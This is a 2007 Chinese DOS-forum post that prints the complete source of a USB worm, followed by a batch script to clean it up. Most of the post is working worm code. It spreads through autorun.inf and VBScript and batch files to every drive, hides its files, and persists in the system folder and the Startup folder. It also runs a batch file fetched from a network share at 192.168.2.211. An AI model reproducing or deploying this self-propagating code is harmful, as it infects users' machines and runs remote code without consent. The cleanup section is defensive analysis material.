刚发现的一个U盘病毒(源代码与清理方法) - DOS批处理 & 脚本技术（批处理室） - 中国DOS联盟论坛

autorun.inf [Autorun] open=wscript.exe u.vbe shell\open\Command=wscript.exe u.vbe shell\explore\Command=wscript.exe u.vbe shell\find\Command=wscript.exe u.vbe u.vbe wscript.createobject("wscript.shell").run """u.bat"" /start",0 U.bat @echo off setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS cd /d "%~dp0" if /i "%cd%"=="%~d0\" (explorer.exe "%~d0") set v=01 set "endf=%systemdrive%\8bye.txt" call:ie s.vbe echo.Wscript.sleep 10000>s.vbe attrib s.vbe +a +s +r +h if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof) set dl=CDEFGHIJKLMNOPQRSTUVWXYZ set n=0 call:inf >inf.tem call:ql uda.a md "%systemroot%\bakfiles\" call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat" copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat" call:ie "%systemroot%\bakfiles\uda.a" call:copy uda.a "%systemroot%\bakfiles\" :s echo. >uhere-%v%.txt if exist "%endf%" (set n=1&goto end) if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat)) set d=!dl:~%n%,1!: set /a n=n+1 if not exist %d% (goto s) if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f rd "%d%\autorun.inf" /s /q) if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1) if not exist "%d%\%~n0.vbe" (goto s2) if not exist "%d%\%~nx0" (goto s3) if not exist "%d%\uda.a" (goto s4) if exist %d%\%date:~0,10%.sk (goto s) :s1 call:inf >%d%\autorun.inf attrib %d%\autorun.inf +a +s +r +h call:ie "%d%\%~n0.vbe" :s2 call:vbe "%~nx0" >"%d%\%~n0.vbe" attrib "%d%\%~n0.vbe" +a +s +r +h :s3 call:copy "%~dpnx0" "%d%\" :s4 call:copy "uda.a" "%d%\" call:ie %d%\*.sk echo.>%d%\%date:~0,10%.sk attrib %d%\%date:~0,10%.sk +a +s +r +h goto s :cb if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe) if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof)))) call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt call:copy "%~dpnx0" "%systemroot%\" call:copy "uda.a" "%systemroot%\" call:ie "%systemroot%\%~n0.vbe" call:vbe "%~nx0" >"%systemroot%\%~n0.vbe" call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe" goto :eof :v set "v0=%~nx1" set /a "v0=%v0:~6,2%" goto :eof :rm echo. 看到这个，请不要慌张。电脑病毒的定义为：1、传播性；2、潜伏性；3、破坏性。根据此定义，本脚本这完全符合1，有点符合2，不符合3（若说破坏性也不是没有，但只针对U盘病毒，而且会在删除文件前备份，备份地址：%systemroot%\bakfiles\），因此，病毒二字加了引号，即不是真正的病毒。本脚本的目的是通过U盘传播，并沿途清理U盘中的病毒，如果可能，会把收集到的病毒文件发给作者；不会给您造成太多不便（与其被U盘病毒感染，不如被本脚本感染啦）。如果您觉得这样给您造成了不便，想卸载本脚本，请在%systemdrive%\下新建一个名为8bye的文本文件（不需要写入内容，即：新建%endf%），大约在20秒内完成卸载，并帮助您进行U盘病毒免疫。欲了解更多，请打开 U盘病毒分析的自述文件（地址：%systemroot%\readme.txt）。谢谢！清理方法如下 @echo off color f4 echo 时间紧迫原因该文件可能还有不完善的地方 ....还请见凉 set /p tmp=按回车清楚 U.bat 病毒 taskkill /im wscript.exe /t /f attrib -s -h -r c:\autorun.inf attrib -s -h -r c:\u.bat attrib -s -h -r c:\u.vbe attrib -s -h -r c:\windows\s.vbe attrib -s -h -r c:\windows\u.bat del c:\autorun.inf del c:\u.bat del c:\u.vbe del c:\windows\s.vbe del c:\windows\u.bat for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\autorun.inf attrib -s -h -r %%d:\autorun.inf for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\s.vbe attrib -s -h -r %%d:\s.vbe for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\u.vbe attrib -s -h -r %%d:\u.vbe for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\u.bat attrib -s -h -r %%d:\u.bat for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\autorun.inf del %%d:\autorun.inf /q for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\u.bat del %%d:\u.bat /q for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\s.vbe del %%d:\s.vbe /q for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%d:\u.vbe del %%d:\u.vbe /q reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SVOHOST /f reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /f set /p tmp=病毒已删除.......重启系统见效!.. [ Last edited by kennyfan on 2007-5-22 at 11:56 PM ]